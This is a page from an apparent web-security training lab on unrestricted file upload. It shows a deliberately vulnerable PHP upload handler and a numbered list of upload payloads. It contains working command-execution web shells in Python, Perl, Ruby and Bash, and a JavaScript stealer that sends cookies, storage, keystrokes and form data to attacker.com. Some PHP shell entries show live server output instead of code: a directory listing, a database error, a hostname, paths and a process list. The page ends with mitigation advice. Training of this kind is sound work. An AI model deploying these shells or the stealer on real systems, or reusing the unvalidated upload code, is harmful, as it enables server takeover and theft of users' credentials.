Lab 1: Basic File Upload - File Upload Labs

Difficulty: Low

Lab Overview

This lab demonstrates a basic file upload vulnerability where users can upload files without proper validation. The application accepts any file type and stores it directly on the server without checking file content or extensions.

Objective: Upload malicious files to achieve server compromise or data exfiltration.

Vulnerable Code

// Vulnerable: Basic file upload without validation
function process_file_upload($file) {
    if (empty($file['name'])) {
        return false;
    }
    
    // Vulnerable: Direct file upload without validation
    $upload_dir = 'uploads/';
    if (!file_exists($upload_dir)) {
        mkdir($upload_dir, 0755, true);
    }
    
    $file_path = $upload_dir . basename($file['name']);
    
    if (move_uploaded_file($file['tmp_name'], $file_path)) {
        return $file_path;
    }
    
    return false;
}

File Upload

⚠️ File Upload Warning

This lab demonstrates file upload vulnerabilities. You can upload:

PHP files (webshells)
Executable files
Script files
Any file type

File Upload Examples

Try uploading these files:

webshell.php - PHP web shell
malicious.js - JavaScript file
backdoor.exe - Executable file
config.txt - Configuration file

Uploaded Files

No files uploaded yet.

Vulnerability Details

Type: File Upload
Severity: High
Method: POST
Issue: No file validation or filtering

Test Files

webshell.php - PHP web shell
malicious.js - JavaScript file
backdoor.exe - Executable file
config.txt - Configuration file

File Upload Payloads

Use these files to test file upload vulnerabilities:

1. Basic PHP Web Shell (webshell.php):

2. Advanced PHP Web Shell (advanced_shell.php):

3. File Manager Web Shell (filemanager.php):

.
..
1.php
2.php
3.php
4.php
5.php
backdoor.php
error_log
index.php
List Files

4. Database Web Shell (db_shell.php):

Error: SQLSTATE[28000] [1045] Access denied for user 'root'@'localhost' (using password: NO)

5. Reverse Shell (reverse_shell.php):

6. Data Exfiltration Shell (exfil_shell.php):

7. Keylogger Shell (keylogger.php):

View Keylog

8. File Upload Shell (upload_shell.php):

9. System Information Shell (info_shell.php):

System Information

PHP Version: 8.1.33

Server: LiteSpeed/6.3.4 Enterprise

OS: Linux v999.srv-console.green 5.14.0-570.55.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Oct 21 05:27:51 EDT 2025 x86_64

Current Directory: /home/kzlabsst/practice.kzlabs.store/fileupload

Disk Space: 232417267712 bytes free

Environment Variables

Process List

USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
kzlabsst 3765833  0.0  0.0 150872 40624 ?        S    09:29   0:00 lsphp
kzlabsst 3791951  0.3  0.0 159188 31824 ?        Ss   09:30   0:00 lsphp
kzlabsst 3792000  0.6  0.0 159400 32848 ?        Ss   09:30   0:00 lsphp:absst/practice.kzlabs.store/fileupload/1.php
kzlabsst 3792858  0.0  0.0   7236  3072 ?        R    09:30   0:00 ps aux

10. Network Scanner Shell (network_shell.php):

11. JavaScript Web Shell (webshell.js):

// JavaScript Web Shell
fetch('https://attacker.com/steal', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
        cookie: document.cookie,
        localStorage: JSON.stringify(localStorage),
        sessionStorage: JSON.stringify(sessionStorage),
        userAgent: navigator.userAgent,
        url: window.location.href
    })
});

// Keylogger
document.addEventListener('keypress', function(e) {
    fetch('https://attacker.com/keys', {
        method: 'POST',
        body: 'key=' + e.key
    });
});

// Form hijacking
var forms = document.getElementsByTagName('form');
for (var i = 0; i < forms.length; i++) {
    forms[i].addEventListener('submit', function(e) {
        var data = new FormData(this);
        fetch('https://attacker.com/forms', {
            method: 'POST',
            body: data
        });
    });
}

12. Python Web Shell (webshell.py):

#!/usr/bin/env python3 import cgi import subprocess import os print("Content-Type: text/html\n") form = cgi.FieldStorage() if 'cmd' in form: cmd = form['cmd'].value try: result = subprocess.run(cmd, shell=True, capture_output=True, text=True) print(f"

{result.stdout}

") if result.stderr: print(f"

Error: {result.stderr}

") except Exception as e: print(f"

Error: {e}

") print(""" """)

13. Perl Web Shell (webshell.pl):

#!/usr/bin/perl use CGI; use strict; my $cgi = new CGI; print $cgi->header; if ($cgi->param('cmd')) { my $cmd = $cgi->param('cmd'); my $output = `$cmd 2>&1`; print "

$output

"; } print < HTML

14. Ruby Web Shell (webshell.rb):

#!/usr/bin/env ruby require 'cgi' cgi = CGI.new puts cgi.header if cgi['cmd'] && !cgi['cmd'].empty? cmd = cgi['cmd'] output = `#{cmd} 2>&1` puts "

#{output}

" end puts < HTML

15. Bash Web Shell (webshell.sh):

#!/bin/bash echo "Content-Type: text/html" echo "" if [ "$REQUEST_METHOD" = "POST" ]; then read -r cmd echo "

"
    eval "$cmd" 2>&1
    echo "

" fi cat << 'EOF' EOF

Real-World Attack Scenarios

Remote Code Execution (RCE) through web shells
Server compromise and data breaches
Web shell installation and persistence
Data exfiltration and sensitive information disclosure
Denial of Service (DoS) attacks
Compliance violations and security breaches

Mitigation Strategies

Implement proper file type validation and whitelisting
Use file content validation instead of relying on extensions
Implement file size limits and upload quotas
Store uploaded files outside web root directory
Implement proper file permissions and access controls
Regular security testing and vulnerability assessments
Monitor for unusual file upload patterns
Implement Content Security Policy (CSP)